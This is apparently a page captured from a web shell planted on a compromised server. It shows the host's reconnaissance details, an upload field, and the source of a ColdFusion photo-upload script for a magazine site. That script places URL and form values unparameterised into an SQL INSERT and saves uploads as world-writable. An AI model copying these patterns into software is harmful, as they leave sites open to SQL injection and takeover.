| Server IP : 104.21.21.239 / Your IP : 216.73.216.11 Web Server : Apache/2.4.68 (Amazon Linux) OpenSSL/3.5.5 System : Linux ip-172-31-69-123.ec2.internal 6.1.176-223.369.amzn2023.x86_64 #1 SMP PREEMPT_DYNAMIC Fri Jul 24 13:34:27 UTC 2026 x86_64 User : ec2-user ( 1000) PHP Version : 8.4.23 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : ON Directory : /home/home2/cgny/nympadmin/ |
Upload File : |
<cfset ds='cityguide'> <cfset imagepath="/home/home2/cgny/public_html/2019/columnpic2"> <cfset thumbpath="/home/home2/cgny/public_html/2019/columnpic2"> <cfset imagedir="http://www.nymetroparents.com/columnpic2"> <cfset thumbdir="http://www.nymetroparents.com/columnpic2"> <cffile action="upload" nameconflict="makeunique" accept="image/jpeg,image/pjpeg" filefield="photo" destination="/home/home2/cgny/public_html/2019/columnpic2" mode="777"> <cfset photo = "#File.ServerFile#"> <cfset thumbnail = 'nd#photo#'> <cfimage source="/home/home2/cgny/public_html/2019/columnpic2/#File.ServerFile#" name="myImage"> <cfset width=#ImageGetWidth(myImage)#> <cfif #width# gt 5000> <CF_GraphicsMagick action="ResizeWidth" Infile="/home/home2/cgny/public_html/2019/columnpic2/#File.ServerFile#" width="1650" Outfile="/home/home2/cgny/public_html/2019/columnpic2/#File.ServerFile#" quality="90"> <cfelse> <CF_GraphicsMagick action="ResizeWidth" Infile="/home/home2/cgny/public_html/2019/columnpic2/#photo#" width="600" filter="Catrom" Outfile="/home/home2/cgny/public_html/2019/columnpic2/nd#photo#" quality="90"> </cfif> <cfquery name=addphoto datasource=#ds#> INSERT INTO columnpic(colid,size,photo,bigphoto,height) VALUES(#url.id#,#form.thumbsize#,'#thumbnail#','#photo#',#form.height#) </cfquery> <CF_GraphicsMagick action="ResizeWidth" Infile="/home/home2/cgny/public_html/2019/columnpic2/#photo#" width="#form.thumbsize#" filter="Catrom" Outfile="/home/home2/cgny/public_html/2019/columnpic2/and#photo#" quality="90"> <cffile action = "rename" source = "/home/home2/cgny/public_html/2019/columnpic2/and#photo#" destination = "/home/home2/cgny/public_html/2019/columnpic2/nd#photo#" mode = "644"> <Cflocation url="editcol3335.cfm?id=#url.id#&mag=#url.mag#" addToken="no">